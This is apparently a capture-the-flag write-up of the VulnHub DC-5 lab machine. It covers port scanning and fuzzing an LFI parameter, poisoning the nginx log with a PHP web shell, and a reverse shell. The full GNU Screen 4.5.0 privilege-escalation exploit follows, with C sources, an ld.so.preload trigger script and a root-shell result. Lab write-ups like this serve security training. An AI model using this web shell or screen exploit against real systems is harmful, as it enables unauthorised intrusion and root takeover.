I"HX<p>DC-5 starts with discovery of a relatively obvious local file include vulnerability drives us towards a web shell via log poisoning. Once we land a shell, we search for SUID binaries and priv sec to root by exploiting screen-4.5.0 SUID binary. Enjoy this write up as much as I enjoyed writing it!</p>

<h1 id="summery">Summery</h1>
<ul>
  <li>Portscan</li>
  <li>Fuzzing LFI parameter</li>
  <li>Reading files using LFI</li>
  <li>Web Shell via Log Poisoning</li>
  <li>Getting reverse shell</li>
  <li>Finding SUID</li>
  <li>Privilege Escalation by exploiting <code class="language-plaintext highlighter-rouge">screen-4.5.0</code></li>
  <li>Root shell</li>
  <li>The Flag</li>
</ul>

<h1 id="portscan">Portscan</h1>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td> --><td class="rouge-code"><pre>Nmap scan report for 192.168.1.7
Host is up (0.00061s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
80/tcp  open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35668/tcp   status
|   100024  1          52987/tcp6  status
|   100024  1          53084/udp6  status
|_  100024  1          57579/udp   status

</pre></td></tr></tbody></table></code></pre></div></div>
<h1 id="website">Website</h1>

<p>When we browse the website with its IP address, it conatins some static pages.
<img src="/assets/img/dc-5/mainpage.png" alt="website" /></p>

<h2 id="gobuster">Gobuster</h2>
<p>I use gobuster to findout files and directories.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td> --><td class="rouge-code"><pre><span class="nv">$gobuster</span> <span class="nb">dir</span> <span class="nt">-w</span> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt <span class="nt">-u</span> http://192.168.1.7 <span class="nt">-x</span> php,html,txt <span class="nt">-o</span> go-main.out
<span class="o">===============================================================</span>
Gobuster v3.0.1
by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> &amp; Christian Mehlmauer <span class="o">(</span>@_FireFart_<span class="o">)</span>
<span class="o">===============================================================</span>
<span class="o">[</span>+] Url:            http://192.168.1.7
<span class="o">[</span>+] Threads:        10
<span class="o">[</span>+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
<span class="o">[</span>+] Status codes:   200,204,301,302,307,401,403
<span class="o">[</span>+] User Agent:     gobuster/3.0.1
<span class="o">[</span>+] Extensions:     php,html,txt
<span class="o">[</span>+] Timeout:        10s
<span class="o">===============================================================</span>
2020/08/30 19:26:34 Starting gobuster
<span class="o">===============================================================</span>
/images <span class="o">(</span>Status: 301<span class="o">)</span>
/index.php <span class="o">(</span>Status: 200<span class="o">)</span>
/contact.php <span class="o">(</span>Status: 200<span class="o">)</span>
/faq.php <span class="o">(</span>Status: 200<span class="o">)</span>
/solutions.php <span class="o">(</span>Status: 200<span class="o">)</span>
/footer.php <span class="o">(</span>Status: 200<span class="o">)</span>
/css <span class="o">(</span>Status: 301<span class="o">)</span>
/about-us.php <span class="o">(</span>Status: 200<span class="o">)</span>
/thankyou.php <span class="o">(</span>Status: 200<span class="o">)</span>

</pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="finding-lfi">Finding LFI</h1>

<p>After visiting these pages several times, I noticed that the <code class="language-plaintext highlighter-rouge">copyright year</code> in <code class="language-plaintext highlighter-rouge">thankyou.php</code> gets changed every time I refresh the page.
<img src="/assets/img/dc-5/2020.png" alt="t1" />
<img src="/assets/img/dc-5/2017.png" alt="t2" />
So I decided to <code class="language-plaintext highlighter-rouge">FUZZ</code> the website.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre></td> --><td class="rouge-code"><pre><span class="nv">$wfuzz</span> <span class="nt">--hh</span> 851 <span class="nt">-w</span> ~/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt <span class="nt">-u</span> http://192.168.1.7/thankyou.php?FUZZ<span class="o">=</span>

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz<span class="s1">'s documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.1.7/thankyou.php?FUZZ=
Total requests: 2588

===================================================================
ID           Response   Lines    Word     Chars       Payload        
===================================================================

000000010:   200        42 L     63 W     835 Ch      "file"         

Total time: 5.193434
Processed Requests: 2588
Filtered Requests: 2587
Requests/sec.: 498.3215
</span></pre></td></tr></tbody></table></code></pre></div></div>
<p>Here I found the <code class="language-plaintext highlighter-rouge">file</code> parameter and using it we can read files too.
<img src="/assets/img/dc-5/passwd.png" alt="etc-passwd" /></p>

<h1 id="web-shell-via-log-poisoning">Web Shell via Log Poisoning</h1>
<p>Log Poisoning is to put some php into the logs, and then load using lfi. We know that nginx server stored logs in /var/log/ngnix/error.log. The easy way would be to add php code in url it will get written in the log file and then access it with lfi.</p>

<h2 id="inject-the-php-code">Inject the PHP code</h2>
<p>I inject the php code to get the command line access by making a GET request to the server.</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre><span class="cp">&lt;?php</span> <span class="nb">system</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'cmd'</span><span class="p">])</span> <span class="cp">?&gt;</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p><img src="/assets/img/dc-5/phpinjection.png" alt="phpinjection" /></p>
<h2 id="getting-reverse-shell">Getting reverse shell</h2>
<p>To get code execution on site I added <code class="language-plaintext highlighter-rouge">cmd</code> parameter to URL.
It looks like this</p>
<blockquote>
  <p>http://192.168.1.6/thankyou.php?file=/var/log/nginx/error.log&amp;cmd=id</p>
</blockquote>

<p>We can execute any system command on server using it. I execute reverse shell.</p>

<p><img src="/assets/img/dc-5/reverse.png" alt="reverse" /></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td> --><td class="rouge-code"><pre>┌─[hitesh@parrot]─[~/boxes/vulnhub/dc-5]
└──╼ <span class="nv">$nc</span> <span class="nt">-nvlp</span> 4444
listening on <span class="o">[</span>any] 4444 ...
connect to <span class="o">[</span>192.168.1.2] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>192.168.1.6] 58309
python <span class="nt">-c</span> <span class="s1">'import pty;pty.spawn("/bin/bash")'</span>
www-data@dc-5:~/html<span class="nv">$ </span>^Z
<span class="o">[</span>1]+  Stopped                 nc <span class="nt">-nvlp</span> 4444
┌─[✗]─[hitesh@parrot]─[~/boxes/vulnhub/dc-5]
└──╼ <span class="nv">$stty</span> raw <span class="nt">-echo</span>
┌─[hitesh@parrot]─[~/boxes/vulnhub/dc-5]
└──╼ <span class="nv">$nc</span> <span class="nt">-nvlp</span> 4444

www-data@dc-5:~/html<span class="nv">$ </span><span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>xterm
</pre></td></tr></tbody></table></code></pre></div></div>
<h1 id="privsec-to-root">Privsec to Root</h1>

<p>Looking at SUID files, <code class="language-plaintext highlighter-rouge">/bin/screen-4.5.0</code> seem suspicious to me.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre></td> --><td class="rouge-code"><pre>www-data@dc-5:~/html$ find / -perm -4000 2&gt;/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Here is an exploit I found on searchsploit.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre><span class="nv">$searchsploit</span> screen 4.5.0
<span class="nt">-----------------------------------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
 Exploit Title                                                                                       |  Path
<span class="nt">-----------------------------------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
GNU Screen 4.5.0 - Local Privilege Escalation                                                        | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation <span class="o">(</span>PoC<span class="o">)</span>                                                  | linux/local/41152.txt
<span class="nt">-----------------------------------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
Shellcodes: No Results
</pre></td></tr></tbody></table></code></pre></div></div>
<p>The exploit has 3 steps. Two compile and one is exploit.</p>

<p>The files are</p>

<h3 id="1-libhaxc">1. libhax.c</h3>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td> --><td class="rouge-code"><pre><span class="cp">#include &lt;stdio.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;unistd.h&gt;
</span><span class="n">__attribute__</span> <span class="p">((</span><span class="n">__constructor__</span><span class="p">))</span>
<span class="kt">void</span> <span class="nf">dropshell</span><span class="p">(</span><span class="kt">void</span><span class="p">){</span>
    <span class="n">chown</span><span class="p">(</span><span class="s">"/tmp/rootshell"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="n">chmod</span><span class="p">(</span><span class="s">"/tmp/rootshell"</span><span class="p">,</span> <span class="mo">04755</span><span class="p">);</span>
    <span class="n">unlink</span><span class="p">(</span><span class="s">"/etc/ld.so.preload"</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[+] done!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="2-rootshellc">2. rootshell.c</h3>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre><span class="cp">#include &lt;stdio.h&gt;
</span><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">){</span>
    <span class="n">setuid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="n">setgid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="n">seteuid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="n">setegid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="n">execvp</span><span class="p">(</span><span class="s">"/bin/sh"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="3-41154sh">3. 41154.sh</h3>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td> --><td class="rouge-code"><pre><span class="nb">cd</span> /etc
<span class="nb">umask </span>000 <span class="c"># because</span>
screen <span class="nt">-D</span> <span class="nt">-m</span> <span class="nt">-L</span> ld.so.preload <span class="nb">echo</span> <span class="nt">-ne</span>  <span class="s2">"</span><span class="se">\x</span><span class="s2">0a/tmp/libhax.so"</span> <span class="c"># newline needed</span>
<span class="nb">echo</span> <span class="s2">"[+] Triggering..."</span>
screen <span class="nt">-ls</span> <span class="c"># screen itself is setuid, so... </span>
/tmp/rootshell
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Run libhax.c and rootshell.c on local machine</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</pre></td> --><td class="rouge-code"><pre><span class="nv">$gcc</span> <span class="nt">-fPIC</span> <span class="nt">-shared</span> <span class="nt">-ldl</span> <span class="nt">-o</span> libhax.so libhax.c
libhax.c: In <span class="k">function</span> ‘dropshell’:
libhax.c:7:5: warning: implicit declaration of <span class="k">function</span> ‘chmod’ <span class="o">[</span><span class="nt">-Wimplicit-function-declaration</span><span class="o">]</span>
    7 |     <span class="nb">chmod</span><span class="o">(</span><span class="s2">"/tmp/rootshell"</span>, 04755<span class="o">)</span><span class="p">;</span>
      |     ^~~~~
<span class="nv">$gcc</span> <span class="nt">-o</span> rootshell rootshell.c
rootshell.c: In <span class="k">function</span> ‘main’:
rootshell.c:3:5: warning: implicit declaration of <span class="k">function</span> ‘setuid’ <span class="o">[</span><span class="nt">-Wimplicit-function-declaration</span><span class="o">]</span>
    3 |     setuid<span class="o">(</span>0<span class="o">)</span><span class="p">;</span>
      |     ^~~~~~
rootshell.c:4:5: warning: implicit declaration of <span class="k">function</span> ‘setgid’ <span class="o">[</span><span class="nt">-Wimplicit-function-declaration</span><span class="o">]</span>
    4 |     setgid<span class="o">(</span>0<span class="o">)</span><span class="p">;</span>
      |     ^~~~~~
rootshell.c:5:5: warning: implicit declaration of <span class="k">function</span> ‘seteuid’ <span class="o">[</span><span class="nt">-Wimplicit-function-declaration</span><span class="o">]</span>
    5 |     seteuid<span class="o">(</span>0<span class="o">)</span><span class="p">;</span>
      |     ^~~~~~~
rootshell.c:6:5: warning: implicit declaration of <span class="k">function</span> ‘setegid’ <span class="o">[</span><span class="nt">-Wimplicit-function-declaration</span><span class="o">]</span>
    6 |     setegid<span class="o">(</span>0<span class="o">)</span><span class="p">;</span>
      |     ^~~~~~~
rootshell.c:7:5: warning: implicit declaration of <span class="k">function</span> ‘execvp’ <span class="o">[</span><span class="nt">-Wimplicit-function-declaration</span><span class="o">]</span>
    7 |     execvp<span class="o">(</span><span class="s2">"/bin/sh"</span>, NULL, NULL<span class="o">)</span><span class="p">;</span>
      |     ^~~~~~
rootshell.c:7:5: warning: too many arguments to built-in <span class="k">function</span> ‘execvp’ expecting 2 <span class="o">[</span><span class="nt">-Wbuiltin-declaration-mismatch</span><span class="o">]</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Now we have total 5 files. For simplicity I compress them to tranfer to server.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ls</span>
41154.sh  libhax.c  libhax.so  rootshell  rootshell.c
<span class="nv">$tar</span> <span class="nt">-zcvf</span> exploit.tar.gz <span class="k">*</span>
41154.sh
libhax.c
libhax.so
rootshell
rootshell.c
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Tranfer <code class="language-plaintext highlighter-rouge">exploit.tar.gz</code> to server and decompress the files.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>$python3 -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.1.6 - - [31/Aug/2020 14:13:17] "GET /exploit.tar.gz HTTP/1.1" 200 -
</pre></td></tr></tbody></table></code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre></td> --><td class="rouge-code"><pre>www-data@dc-5:/tmp$ wget http://192.168.1.2:8000/exploit.tar.gz
converted 'http://192.168.1.2:8000/exploit.tar.gz' (ANSI_X3.4-1968) -&gt; 'http://192.168.1.2:8000/exploit.tar.gz' (UTF-8)
--2020-08-31 18:43:15--  http://192.168.1.2:8000/exploit.tar.gz
Connecting to 192.168.1.2:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4430 (4.3K) [application/gzip]
Saving to: 'exploit.tar.gz'

exploit.tar.gz      100%[=====================&gt;]   4.33K  --.-KB/s   in 0s     

2020-08-31 18:43:15 (474 MB/s) - 'exploit.tar.gz' saved [4430/4430]
www-data@dc-5:/tmp$ ls
exploit.tar.gz
www-data@dc-5:/tmp$ tar -zxvf exploit.tar.gz 
41154.sh
libhax.c
libhax.so
rootshell
rootshell.c
www-data@dc-5:/tmp$ ls
41154.sh  exploit.tar.gz  libhax.c  libhax.so  rootshell  rootshell.c
</pre></td></tr></tbody></table></code></pre></div></div>

<p>At last grant permission and execute the exploit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre>www-data@dc-5:/tmp$ chmod +x 41154.sh 
www-data@dc-5:/tmp$ ./41154.sh 
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
</pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="the-flag">The Flag</h1>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
</pre></td> --><td class="rouge-code"><pre># cat thisistheflag.txt


888b    888 d8b                                                      888      888 888 888 
8888b   888 Y8P                                                      888      888 888 888 
88888b  888                                                          888      888 888 888 
888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888 
888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888 
888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P 
888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "  
888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888 
                                                                                          
                                                                                          


Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.  :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

</pre></td></tr></tbody></table></code></pre></div></div>
:ET